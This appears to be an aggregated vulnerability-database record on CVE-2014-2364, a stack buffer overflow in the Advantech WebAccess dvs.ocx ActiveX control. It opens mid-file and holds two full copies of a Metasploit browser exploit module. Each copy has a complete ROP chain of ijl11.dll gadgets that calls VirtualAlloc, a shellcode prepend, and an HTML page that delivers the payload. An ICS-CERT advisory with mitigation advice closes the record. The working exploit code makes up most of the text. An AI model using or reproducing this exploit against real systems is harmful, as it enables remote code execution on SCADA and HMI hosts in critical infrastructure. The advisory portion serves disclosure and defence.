[0x60023588].pack(\"V\") # ECX => (&POP EBX # RETN) \nxpl << [0x6001f1c8].pack(\"V\") # push edx # or al,39h # push ecx # or byte ptr [ebp+5], dh # mov eax, 1 # ret \n# EDX = flAllocationType (0x1000) \nxpl << [0x60012288].pack(\"V\") # POP ECX # RETN \nxpl << [0xffffffff].pack(\"V\") # ecx value \nxpl << [0x6002157e].pack(\"V\") # POP EAX # RETN \nxpl << [0x9ffdbf89].pack(\"V\") # eax value \nxpl << [0x60022b97].pack(\"V\") # ADC EAX,60025078 # RETN \nxpl << [0x60024ea4].pack(\"V\") # MUL EAX,ECX # RETN 0x10 \n# ECX = flProtect (0x40) \nxpl << [0x6002157e].pack(\"V\") # POP EAX # RETN \nxpl << rand_text_alphanumeric(4) # padding \nxpl << rand_text_alphanumeric(4) # padding \nxpl << rand_text_alphanumeric(4) # padding \nxpl << rand_text_alphanumeric(4) # padding \nxpl << [0x60029f6c].pack(\"V\") # .data ijl11.dll \nxpl << [0x60012288].pack(\"V\") # POP ECX # RETN \nxpl << [0xffffffff].pack(\"V\") # ecx value \n0x41.times do \nxpl << [0x6001b8ec].pack(\"V\") # INC ECX # MOV DWORD PTR DS:[EAX],ECX # RETN \nend \n# EAX = ptr to &VirtualAlloc() \nxpl << [0x6001db7e].pack(\"V\") # POP EAX # RETN [ijl11.dll] \nxpl << [0x600250c8].pack(\"V\") # ptr to &VirtualAlloc() [IAT ijl11.dll] \n# EBP = POP (skip 4 bytes) \nxpl << [0x6002054b].pack(\"V\") # POP EBP # RETN \nxpl << [0x6002054b].pack(\"V\") # ptr to &(# pop ebp # retn) \n# ESI = ptr to JMP [EAX] \nxpl << [0x600181cc].pack(\"V\") # POP ESI # RETN \nxpl << [0x6002176e].pack(\"V\") # ptr to &(# jmp[eax]) \n# EDI = ROP NOP (RETN) \nxpl << [0x60021ad1].pack(\"V\") # POP EDI # RETN \nxpl << [0x60021ad2].pack(\"V\") # ptr to &(retn) \n# ESP = lpAddress (automatic) \n# PUSHAD # RETN \nxpl << [0x60018399].pack(\"V\") # PUSHAD # RETN \nxpl << [0x6001c5cd].pack(\"V\") # ptr to &(# push esp # retn) \nxpl << code \n \nxpl.gsub!(\"\\\"\", \"\\\\\\\"\") # Escape double quote, to not break javascript string \nxpl.gsub!(\"\\\\\", \"\\\\\\\\\") # Escape back slash, to avoid javascript escaping \n \nxpl \nend \n \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/128384/advantech_webaccess_dvs_getcolor.rb.txt"}], "exploitdb": [{"lastseen": "2016-02-03T23:52:40", "osvdbidlist": ["109327", "109322", "109328", "109324", "109326", "109315", "109323", "109321", "109320", "109329", "109325", "109319"], "references": [], "description": "Advantech WebAccess dvs.ocx GetColor Buffer Overflow. CVE-2014-2364. Remote exploit for windows platform", "edition": 1, "reporter": "metasploit", "published": "2014-09-24T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "exploitdb", "title": "Advantech WebAccess dvs.ocx GetColor Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-2364"], "modified": "2014-09-24T00:00:00", "id": "EDB-ID:34757", "href": "https://www.exploit-db.com/exploits/34757/", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Advantech WebAccess dvs.ocx GetColor Buffer Overflow',\r\n 'Description' => %q{\r\n This module exploits a buffer overflow vulnerability in Advantec WebAccess. The\r\n vulnerability exists in the dvs.ocx ActiveX control, where a dangerous call to\r\n sprintf can be reached with user controlled data through the GetColor function.\r\n This module has been tested successfully on Windows XP SP3 with IE6 and Windows\r\n 7 SP1 with IE8 and IE 9.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Unknown', # Vulnerability discovery\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2014-2364'],\r\n ['ZDI', '14-255'],\r\n ['URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-14-198-02']\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'Retries' => false,\r\n 'InitialAutoRunScript' => 'migrate -f'\r\n },\r\n 'BrowserRequirements' =>\r\n {\r\n :source => /script|headers/i,\r\n :os_name => Msf::OperatingSystems::WINDOWS,\r\n :ua_name => /MSIE/i,\r\n :ua_ver => lambda { |ver| Gem::Version.new(ver) < Gem::Version.new('10') },\r\n :clsid => \"{5CE92A27-9F6A-11D2-9D3D-000001155641}\",\r\n :method => \"GetColor\"\r\n },\r\n 'Payload' =>\r\n {\r\n 'Space' => 1024,\r\n 'DisableNops' => true,\r\n 'BadChars' => \"\\x00\\x0a\\x0d\\x5c\",\r\n # Patch the stack to execute the decoder...\r\n 'PrependEncoder' => \"\\x81\\xc4\\x9c\\xff\\xff\\xff\", # add esp, -100\r\n # Fix the stack again, this time better :), before the payload\r\n # is executed.\r\n 'Prepend' => \"\\x64\\xa1\\x18\\x00\\x00\\x00\" + # mov eax, fs:[0x18]\r\n \"\\x83\\xC0\\x08\" + # add eax, byte 8\r\n \"\\x8b\\x20\" + # mov esp, [eax]\r\n \"\\x81\\xC4\\x30\\xF8\\xFF\\xFF\" # add esp, -2000\r\n },\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X86,\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', { } ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Jul 17 2014'))\r\n end\r\n\r\n def on_request_exploit(cli, request, target_info)\r\n print_status(\"Requested: #{request.uri}\")\r\n\r\n content = <<-EOS\r\n<html>\r\n<head>\r\n<meta http-equiv=\"cache-control\" content=\"max-age=0\" />\r\n<meta http-equiv=\"cache-control\" content=\"no-cache\" />\r\n<meta http-equiv=\"expires\" content=\"0\" />\r\n<meta http-equiv=\"expires\" content=\"Tue, 01 Jan 1980 1:00:00 GMT\" />\r\n<meta http-equiv=\"pragma\" content=\"no-cache\" />\r\n</head>\r\n<body>\r\n<object classid='clsid:5CE92A27-9F6A-11D2-9D3D-000001155641' id='test' /></object>\r\n<script language='javascript'>\r\ntest.GetColor(\"#{rop_payload(get_payload(cli, target_info))}\", 0);\r\n</script>\r\n</body>\r\n</html>\r\n EOS\r\n\r\n print_status(\"Sending #{self.name}\")\r\n send_response_html(cli, content, {'Pragma' => 'no-cache'})\r\n end\r\n\r\n # Uses gadgets from ijl11.dll 1.1.2.16\r\n def rop_payload(code)\r\n xpl = rand_text_alphanumeric(61) # offset\r\n xpl << [0x60014185].pack(\"V\") # RET\r\n xpl << rand_text_alphanumeric(8)\r\n\r\n # EBX = dwSize (0x40)\r\n xpl << [0x60012288].pack(\"V\") # POP ECX # RETN\r\n xpl << [0xffffffff].pack(\"V\") # ecx value\r\n xpl << [0x6002157e].pack(\"V\") # POP EAX # RETN\r\n xpl << [0x9ffdafc9].pack(\"V\") # eax value\r\n xpl << [0x60022b97].pack(\"V\") # ADC EAX,60025078 # RETN\r\n xpl << [0x60024ea4].pack(\"V\") # MUL EAX,ECX # RETN 0x10\r\n xpl << [0x60018084].pack(\"V\") # POP EBP # RETN\r\n xpl << rand_text_alphanumeric(4) # padding\r\n xpl << rand_text_alphanumeric(4) # padding\r\n xpl << rand_text_alphanumeric(4) # padding\r\n xpl << rand_text_alphanumeric(4) # padding\r\n xpl << [0x60029f6c].pack(\"V\") # .data ijl11.dll\r\n xpl << [0x60012288].pack(\"V\") # POP ECX # RETN\r\n xpl << [0x60023588].pack(\"V\") # ECX => (&POP EBX # RETN)\r\n xpl << [0x6001f1c8].pack(\"V\") # push edx # or al,39h # push ecx # or byte ptr [ebp+5], dh # mov eax, 1 # ret\r\n # EDX = flAllocationType (0x1000)\r\n xpl << [0x60012288].pack(\"V\") # POP ECX # RETN\r\n xpl << [0xffffffff].pack(\"V\") # ecx value\r\n xpl << [0x6002157e].pack(\"V\") # POP EAX # RETN\r\n xpl << [0x9ffdbf89].pack(\"V\") # eax value\r\n xpl << [0x60022b97].pack(\"V\") # ADC EAX,60025078 # RETN\r\n xpl << [0x60024ea4].pack(\"V\") # MUL EAX,ECX # RETN 0x10\r\n # ECX = flProtect (0x40)\r\n xpl << [0x6002157e].pack(\"V\") # POP EAX # RETN\r\n xpl << rand_text_alphanumeric(4) # padding\r\n xpl << rand_text_alphanumeric(4) # padding\r\n xpl << rand_text_alphanumeric(4) # padding\r\n xpl << rand_text_alphanumeric(4) # padding\r\n xpl << [0x60029f6c].pack(\"V\") # .data ijl11.dll\r\n xpl << [0x60012288].pack(\"V\") # POP ECX # RETN\r\n xpl << [0xffffffff].pack(\"V\") # ecx value\r\n 0x41.times do\r\n xpl << [0x6001b8ec].pack(\"V\") # INC ECX # MOV DWORD PTR DS:[EAX],ECX # RETN\r\n end\r\n # EAX = ptr to &VirtualAlloc()\r\n xpl << [0x6001db7e].pack(\"V\") # POP EAX # RETN [ijl11.dll]\r\n xpl << [0x600250c8].pack(\"V\") # ptr to &VirtualAlloc() [IAT ijl11.dll]\r\n # EBP = POP (skip 4 bytes)\r\n xpl << [0x6002054b].pack(\"V\") # POP EBP # RETN\r\n xpl << [0x6002054b].pack(\"V\") # ptr to &(# pop ebp # retn)\r\n # ESI = ptr to JMP [EAX]\r\n xpl << [0x600181cc].pack(\"V\") # POP ESI # RETN\r\n xpl << [0x6002176e].pack(\"V\") # ptr to &(# jmp[eax])\r\n # EDI = ROP NOP (RETN)\r\n xpl << [0x60021ad1].pack(\"V\") # POP EDI # RETN\r\n xpl << [0x60021ad2].pack(\"V\") # ptr to &(retn)\r\n # ESP = lpAddress (automatic)\r\n # PUSHAD # RETN\r\n xpl << [0x60018399].pack(\"V\") # PUSHAD # RETN\r\n xpl << [0x6001c5cd].pack(\"V\") # ptr to &(# push esp # retn)\r\n xpl << code\r\n\r\n xpl.gsub!(\"\\\"\", \"\\\\\\\"\") # Escape double quote, to not break javascript string\r\n xpl.gsub!(\"\\\\\", \"\\\\\\\\\") # Escape back slash, to avoid javascript escaping\r\n\r\n xpl\r\n end\r\n\r\nend", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/34757/"}], "metasploit": [{"lastseen": "2018-10-11T15:46:39", "_object_types": ["robots.models.metasploit.MetasploitBulletin", "robots.models.base.Bulletin"], "references": [], "description": "This module exploits a buffer overflow vulnerability in Advantec WebAccess. The vulnerability exists in the dvs.ocx ActiveX control, where a dangerous call to sprintf can be reached with user controlled data through the GetColor function. This module has been tested successfully on Windows XP SP3 with IE6 and Windows 7 SP1 with IE8 and IE 9.", "reporter": "Rapid7", "published": "2014-09-12T13:57:54", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb", "type": "metasploit", "title": "Advantech WebAccess dvs.ocx GetColor Buffer Overflow", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-2364"], "_object_type": "robots.models.metasploit.MetasploitBulletin", "modified": "2017-07-24T13:26:21", "metasploitReliability": "Normal", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/ADVANTECH_WEBACCESS_DVS_GETCOLOR", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::BrowserExploitServer\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Advantech WebAccess dvs.ocx GetColor Buffer Overflow',\n 'Description' => %q{\n This module exploits a buffer overflow vulnerability in Advantec WebAccess. The\n vulnerability exists in the dvs.ocx ActiveX control, where a dangerous call to\n sprintf can be reached with user controlled data through the GetColor function.\n This module has been tested successfully on Windows XP SP3 with IE6 and Windows\n 7 SP1 with IE8 and IE 9.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown', # Vulnerability discovery\n 'juan vazquez' # Metasploit module\n ],\n 'References' =>\n [\n ['CVE', '2014-2364'],\n ['ZDI', '14-255'],\n ['URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-14-198-02']\n ],\n 'DefaultOptions' =>\n {\n 'Retries' => false,\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'BrowserRequirements' =>\n {\n :source => /script|headers/i,\n :os_name => OperatingSystems::Match::WINDOWS,\n :ua_name => /MSIE/i,\n :ua_ver => lambda { |ver| Gem::Version.new(ver) < Gem::Version.new('10') },\n :activex => [\n {\n clsid: \"{5CE92A27-9F6A-11D2-9D3D-000001155641}\",\n method: \"GetColor\"\n }\n ]\n },\n 'Payload' =>\n {\n 'Space' => 1024,\n 'DisableNops' => true,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x5c\",\n # Patch the stack to execute the decoder...\n 'PrependEncoder' => \"\\x81\\xc4\\x9c\\xff\\xff\\xff\", # add esp, -100\n # Fix the stack again, this time better :), before the payload\n # is executed.\n 'Prepend' => \"\\x64\\xa1\\x18\\x00\\x00\\x00\" + # mov eax, fs:[0x18]\n \"\\x83\\xC0\\x08\" + # add eax, byte 8\n \"\\x8b\\x20\" + # mov esp, [eax]\n \"\\x81\\xC4\\x30\\xF8\\xFF\\xFF\" # add esp, -2000\n },\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Targets' =>\n [\n [ 'Automatic', { } ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Jul 17 2014'))\n end\n\n def on_request_exploit(cli, request, target_info)\n print_status(\"Requested: #{request.uri}\")\n\n content = <<-EOS\n<html>\n<head>\n<meta http-equiv=\"cache-control\" content=\"max-age=0\" />\n<meta http-equiv=\"cache-control\" content=\"no-cache\" />\n<meta http-equiv=\"expires\" content=\"0\" />\n<meta http-equiv=\"expires\" content=\"Tue, 01 Jan 1980 1:00:00 GMT\" />\n<meta http-equiv=\"pragma\" content=\"no-cache\" />\n</head>\n<body>\n<object classid='clsid:5CE92A27-9F6A-11D2-9D3D-000001155641' id='test' /></object>\n<script language='javascript'>\ntest.GetColor(\"#{rop_payload(get_payload(cli, target_info))}\", 0);\n</script>\n</body>\n</html>\n EOS\n\n print_status(\"Sending #{self.name}\")\n send_response_html(cli, content, {'Pragma' => 'no-cache'})\n end\n\n # Uses gadgets from ijl11.dll 1.1.2.16\n def rop_payload(code)\n xpl = rand_text_alphanumeric(61) # offset\n xpl << [0x60014185].pack(\"V\") # RET\n xpl << rand_text_alphanumeric(8)\n\n # EBX = dwSize (0x40)\n xpl << [0x60012288].pack(\"V\") # POP ECX # RETN\n xpl << [0xffffffff].pack(\"V\") # ecx value\n xpl << [0x6002157e].pack(\"V\") # POP EAX # RETN\n xpl << [0x9ffdafc9].pack(\"V\") # eax value\n xpl << [0x60022b97].pack(\"V\") # ADC EAX,60025078 # RETN\n xpl << [0x60024ea4].pack(\"V\") # MUL EAX,ECX # RETN 0x10\n xpl << [0x60018084].pack(\"V\") # POP EBP # RETN\n xpl << rand_text_alphanumeric(4) # padding\n xpl << rand_text_alphanumeric(4) # padding\n xpl << rand_text_alphanumeric(4) # padding\n xpl << rand_text_alphanumeric(4) # padding\n xpl << [0x60029f6c].pack(\"V\") # .data ijl11.dll\n xpl << [0x60012288].pack(\"V\") # POP ECX # RETN\n xpl << [0x60023588].pack(\"V\") # ECX => (&POP EBX # RETN)\n xpl << [0x6001f1c8].pack(\"V\") # push edx # or al,39h # push ecx # or byte ptr [ebp+5], dh # mov eax, 1 # ret\n # EDX = flAllocationType (0x1000)\n xpl << [0x60012288].pack(\"V\") # POP ECX # RETN\n xpl << [0xffffffff].pack(\"V\") # ecx value\n xpl << [0x6002157e].pack(\"V\") # POP EAX # RETN\n xpl << [0x9ffdbf89].pack(\"V\") # eax value\n xpl << [0x60022b97].pack(\"V\") # ADC EAX,60025078 # RETN\n xpl << [0x60024ea4].pack(\"V\") # MUL EAX,ECX # RETN 0x10\n # ECX = flProtect (0x40)\n xpl << [0x6002157e].pack(\"V\") # POP EAX # RETN\n xpl << rand_text_alphanumeric(4) # padding\n xpl << rand_text_alphanumeric(4) # padding\n xpl << rand_text_alphanumeric(4) # padding\n xpl << rand_text_alphanumeric(4) # padding\n xpl << [0x60029f6c].pack(\"V\") # .data ijl11.dll\n xpl << [0x60012288].pack(\"V\") # POP ECX # RETN\n xpl << [0xffffffff].pack(\"V\") # ecx value\n 0x41.times do\n xpl << [0x6001b8ec].pack(\"V\") # INC ECX # MOV DWORD PTR DS:[EAX],ECX # RETN\n end\n # EAX = ptr to &VirtualAlloc()\n xpl << [0x6001db7e].pack(\"V\") # POP EAX # RETN [ijl11.dll]\n xpl << [0x600250c8].pack(\"V\") # ptr to &VirtualAlloc() [IAT ijl11.dll]\n # EBP = POP (skip 4 bytes)\n xpl << [0x6002054b].pack(\"V\") # POP EBP # RETN\n xpl << [0x6002054b].pack(\"V\") # ptr to &(# pop ebp # retn)\n # ESI = ptr to JMP [EAX]\n xpl << [0x600181cc].pack(\"V\") # POP ESI # RETN\n xpl << [0x6002176e].pack(\"V\") # ptr to &(# jmp[eax])\n # EDI = ROP NOP (RETN)\n xpl << [0x60021ad1].pack(\"V\") # POP EDI # RETN\n xpl << [0x60021ad2].pack(\"V\") # ptr to &(retn)\n # ESP = lpAddress (automatic)\n # PUSHAD # RETN\n xpl << [0x60018399].pack(\"V\") # PUSHAD # RETN\n xpl << [0x6001c5cd].pack(\"V\") # ptr to &(# push esp # retn)\n xpl << code\n\n xpl.gsub!(\"\\\"\", \"\\\\\\\"\") # Escape double quote, to not break javascript string\n xpl.gsub!(\"\\\\\", \"\\\\\\\\\") # Escape back slash, to avoid javascript escaping\n\n xpl\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb"}], "ics": [{"lastseen": "2018-09-06T20:02:11", "references": ["http://ics-cert.us-cert.gov/content/recommended-practices", "http://cwe.mitre.org/data/definitions/592.html", "https://www.us-cert.gov/forms/feedback?helpful=no&document=ICSA-14-198-02 Advantech WebAccess Vulnerabilities&trackingNumber=&url=https://ics-cert.us-cert.gov/advisories/ICSA-14-198-02&site_name=ICS-CERT", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2366", "http://www.us-cert.gov/pdf/", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2367", "http://www.us-cert.gov/accessibility/", "https://ics-cert.us-cert.gov/Report-Incident?", "http://www.addthis.com/bookmark.php?url=https%3A%2F%2Fics-cert.us-cert.gov%2Fadvisories%2FICSA-14-198-02", "http://cwe.mitre.org/data/definitions/623.html", "http://www.us-cert.gov/tlp/", "http://www.us-cert.gov/tlp/", "http://ics-cert.us-cert.gov", "http://ics-cert.us-cert.gov", "http://ics-cert.us-cert.gov/tips/ICS-TIP-12-146-01B", "http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/Au:N/C:P/I:P/A:P", "http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/Au:N/C:P/I:P/A:P", "http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/Au:N/C:P/I:P/A:P", "https://www.us-cert.gov/forms/feedback?helpful=somewhat&document=ICSA-14-198-02 Advantech WebAccess Vulnerabilities&trackingNumber=&url=https://ics-cert.us-cert.gov/advisories/ICSA-14-198-02&site_name=ICS-CERT", "http://twitter.com/icscert", "http://twitter.com/icscert", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2364", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2365", "http://cwe.mitre.org/data/definitions/316.html", "http://ics-cert.us-cert.gov/", "http://webaccess.advantech.com/", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2368", "https://twitter.com/share?url=https%3A%2F%2Fics-cert.us-cert.gov%2Fadvisories%2FICSA-14-198-02", "https://www.us-cert.gov/forms/feedback?helpful=yes&document=ICSA-14-198-02 Advantech WebAccess Vulnerabilities&trackingNumber=&url=https://ics-cert.us-cert.gov/advisories/ICSA-14-198-02&site_name=ICS-CERT", "http://www.us-cert.gov/privacy/", "http://cwe.mitre.org/data/definitions/284.html", "http://www.dhs.gov", "http://www.dhs.gov/report-cyber-risks", "http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/Au:S/C:C/I:C/A:C", "https://www.facebook.com/sharer.php?u=https%3A%2F%2Fics-cert.us-cert.gov%2Fadvisories%2FICSA-14-198-02", "http://cwe.mitre.org/data/definitions/121.html", "http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/Au:S/C:P/I:P/A:P"], "description": "## OVERVIEW\n\nNCCIC/ICS-CERT received a report from the Zero Day Initiative (ZDI) concerning vulnerabilities affecting the Advantech WebAccess application. These vulnerabilities were reported to ZDI by security researchers Dave Weinstein, Tom Gallagher, John Leitch, and others. Advantech has produced an updated software version that mitigates these vulnerabilities.\n\nThese vulnerabilities could be exploited remotely. Exploits that target these vulnerabilities are known to be publicly available.\n\n## AFFECTED PRODUCTS\n\nThe following Advantech WebAcess versions are affected:\n\n * Advantech WebAcess v7.1 and earlier.\n\n## IMPACT\n\nAn attacker exploiting these vulnerabilities in WebAccess may be able to bypass authentication or cause a denial of service.\n\nImpact to individual organizations depends on many factors that are unique to each organization. ICS-CERT recommends that organizations evaluate the impact of these vulnerabilities based on their operational environment, architecture, and product implementation.\n\n## BACKGROUND\n\nAdvantech is based in Taiwan and has distribution offices in 21 countries worldwide.\n\nAdvantech WebAccess, formerly known as BroadWin WebAccess, is a web-based SCADA and human-machine interface product used in energy, critical manufacturing, commercial facilities, and government facilities. These systems are deployed globally.\n\n## VULNERABILITY CHARACTERIZATION\n\n### VULNERABILITY OVERVIEW\n\n### STACK-BASED BUFFER OVERFLOWSa\n\nThere are multiple ways to overflow the static stack buffer by providing overly long strings to specific parameters (namely ProjectName, SetParameter, NodeName, CCDParameter, SetColor, AlarmImage, GetParameter, GetColor, ServerResponse, SetBaud, and IPAddress) within the webvact.ocx, dvs.ocx, and webdact.ocx ActiveX files.\n\nCVE-2014-2364b has been assigned to these vulnerabilities. A CVSS v2 base score of 7.5 has been assigned; the CVSS vector string is (AV:N/AC:L/Au:N/C:P/I:P/A:P).c\n\n### UNSAFE ACTIVEX CONTROL MARKED SAFE FOR SCRIPTINGd\n\nThe bwocxrun ActiveX control (installed by default as part of setup) allows navigation from the Internet to a local file. This is accomplished through the BrowseFolder method.\n\nCVE-2014-2368e has been assigned to this vulnerability. A CVSS v2 base score of 7.5 has been assigned; the CVSS vector string is (AV:N/AC:L/Au:N/C:P/I:P/A:P).f\n\n### REMOTE AUTHENTICATION BYPASSg\n\nThe ChkCookie subroutine within broadweb\\include\\gChkCook.asp ActiveX control (installed by default as part of setup) allows navigation from the Internet to a local file. If user, proj, and scada are set, and bwuser is set to true, this will grant access to several previously restricted pages.\n\nCVE-2014-2367h has been assigned to this vulnerability. A CVSS v2 base score of 7.5 has been assigned; the CVSS vector string is (AV:N/AC:L/Au:N/C:P/I:P/A:P).i\n\n### PASSWORD DISCLOSUREj\n\nThe upAdminPg.asp component includes the password of the specified account in the underlying HTML when serving the page.\n\nCVE-2014-2366k has been assigned to this vulnerability. A CVSS v2 base score of 9.0 has been assigned; the CVSS vector string is (AV:N/AC:L/Au:S/C:C/I:C/A:C).l\n\n### REMOTE CODE EXECUTIONm\n\nAdvantech WebAccess contains a flaw that enables a malicious user to arbitrarily create and delete files.\n\nCVE-2014-2365n has been assigned to this vulnerability. A CVSS v2 base score of 6.5 has been assigned; the CVSS vector string is (AV:N/AC:L/Au:S/C:P/I:P/A:P).o\n\n### VULNERABILITY DETAILS\n\n#### EXPLOITABILITY\n\nThese vulnerabilities could be exploited remotely.\n\n#### EXISTENCE OF EXPLOIT\n\nExploits that target these vulnerabilities are publicly available.\n\n#### DIFFICULTY\n\nAn attacker with a moderate skill would be able to exploit these vulnerabilities.\n\n## MITIGATION\n\nAdvantech released a new WebAccess Installation Package v7.2 on June 6, 2014, that removes some vulnerable ActiveX components and resolves the vulnerabilities within others. The download link for v7.2 is available at:\n\n<http://webaccess.advantech.com/>\n\nICS-CERT encourages asset owners to take additional defensive measures to protect against this and other cybersecurity risks.\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nICS-CERT also provides a section for control systems security recommended practices on the ICS-CERT web page at: <http://ics-cert.us-cert.gov/content/recommended-practices>. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. ICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nAdditional mitigation guidance and recommended practices are publicly available in the ICS\u2011CERT Technical Information Paper, [ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies](<http://ics-cert.us-cert.gov/tips/ICS-TIP-12-146-01B>), that is available for download from the ICS-CERT web site (<http://ics-cert.us-cert.gov/>).\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.\n\n * a. CWE-121: Stack-Based Buffer Overflow, <http://cwe.mitre.org/data/definitions/121.html>, web site last accessed July 17, 2014.\n * b. NVD, <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2364> , NIST uses this advisory to create the CVE web site report. This web site will be active sometime after publication of this advisory.\n * c. CVSS Calculator, [http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/Au:N/C:P/I:P/A:P](<http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/Au:N/C:P/I:P/A:P>), web site last accessed July 17, 2014.\n * d. CWE-623: Unsafe ActiveX Control Marked Safe For Scripting, <http://cwe.mitre.org/data/definitions/623.html>, web site last accessed July 17, 2014.\n * e. NVD, <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2368>, NIST uses this advisory to create the CVE web site report. This web site will be active sometime after publication of this advisory.\n * f. CVSS Calculator, [http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/Au:N/C:P/I:P/A:P](<http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/Au:N/C:P/I:P/A:P>), web site last accessed July 17, 2014.\n * g. CWE-592: Authentication Bypass Issues, <http://cwe.mitre.org/data/definitions/592.html>, web site last accessed July 17, 2014.\n * h. NVD, <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2367>, NIST uses this advisory to create the CVE web site report. This web site will be active sometime after publication of this advisory.\n * i. CVSS Calculator, [http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/Au:N/C:P/I:P/A:P](<http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/Au:N/C:P/I:P/A:P>), web site last accessed July 17, 2014.\n * j. CWE-316: Cleartext Storage of Sensitive Information in Memory, <http://cwe.mitre.org/data/definitions/316.html>, web site last accessed July 17, 2014.\n * k. NVD, <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2366>, NIST uses this advisory to create the CVE web site report. This web site will be active sometime after publication of this advisory.\n * l. CVSS Calculator, [http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/Au:S/C:C/I:C/A:C](<http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/Au:S/C:C/I:C/A:C>), web site last accessed July 17, 2014.\n * m. CWE-284: Improper Access Control, <http://cwe.mitre.org/data/definitions/284.html>, web site last accessed July 17, 2014.\n * n. NVD, <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2365>, NIST uses this advisory to create the CVE web site report. This web site will be active sometime after publication of this advisory.\n * o. CVSS Calculator, [http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/Au:S/C:P/I:P/A:P](<http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/Au:S/C:P/I:P/A:P>), web site last accessed July 17, 2014.\n", "edition": 6, "reporter": "Industrial Control Systems Cyber Emergency Response Team", "published": "2014-07-17T00:00:00", "title": "Advantech WebAccess Vulnerabilities", "type": "ics", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "info", "cvelist": ["CVE-2014-2367", "CVE-2014-2365", "CVE-2014-2364", "CVE-2014-2366", "CVE-2014-2368"], "modified": "2018-09-06T00:00:00", "id": "ICSA-14-198-02", "href": "https://ics-cert.us-cert.gov//advisories/ICSA-14-198-02", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
